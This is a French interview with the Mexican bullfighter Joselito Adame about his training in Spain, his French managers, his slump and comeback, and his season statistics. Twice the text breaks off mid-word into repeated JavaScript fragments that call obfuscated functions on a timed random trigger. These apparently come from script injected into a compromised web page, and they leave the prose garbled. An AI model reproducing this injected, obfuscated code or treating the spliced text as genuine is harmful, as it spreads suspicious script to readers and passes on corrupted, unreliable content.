ENTRETIEN AVEC JOSELITO ADAME

Le torero d’Aguascalalientes est le seul torero mexicain à être présent aujourd’hui dans toutes les grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes ferias européennes. Mais curieusement c’est en France où il débute en novillada piquée et où il prend l’alternative. Etait-ce le fait du hasard ?

Joselito Adame : Ce n’était pas forcément prévu, mais mes deux apoderados actuels, qui le furent aussi à mes débuts, sont français : Luc Jalabert et Alain Lartigue. Ce qui explique cette relation aussi proche avec la France tout au long de ma carrière. Ce que j’apprécie dans ce pays c’est le respect des aficionados pour le toreo, des aficionados sérieux mais aussi cultivés.

-Dans ton parcours, pour ta formation, tu as élu l’Espagne comme domicile. Pourquoi ?

-Pour moi le toreo est universel, celui qui est figura doit l’être sur toute la planète taurine. Le destin m’a permis de venir en Europe mais je savais dès le départ que pour évoluer, pour progresser, je ne suis pas seulement rester au Mexique.

-Tu as explosé au début de ta carrière, après tu as eu un passage à vide et tu es revenu en force. Que s’est-il passé ?

-Ce qui s’est passé je le dois à Séville et surtout à Madrid. L’année dernière on a vu un autre Joselito Adame, qui ne cherchait pas seulement à plaire, je me suis laissé aller, je me suis abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andonné, j’ai pu exprimer le toreo que j’avais en moi et qui n’arrivait pas à sortir.

-Etre à l’affiche maintenant dans beaucoup de ferias, cela te permet-il d’asseoir ta tauromachie ?

-Tout à fait, cette régularité te permet de t’exprimer différemment, la peur n’est plus un frein, tu es dans le rythme, tu as plus de feeling.

-Tu es maintenant un torero reconnu, te considères-tu une figura ?

-En principe ce n’est pas à moi de le dire, c’est au public, mais je crois qu’il me manque encore des choses à peaufiner, des paliers à gravir, j’ai encore de la marge pour progresser et le jour où je deviendrai indispensable dans toutes les ferias, que j’en marquerai le rythme, alors je commencerai à me sentir figura.

Né le 22 mars 1989 à Aguascalientes.

Alternative : 7 septembre 2007 à Arles.

Apoderados : Alain Lartigue et Luc Jalabert.

Temporada 2013 : 24 corridas et 43 oreilles.

Temporada 2014 : 30 corridas et 36 oreilles.

Les commentaires sont fermés.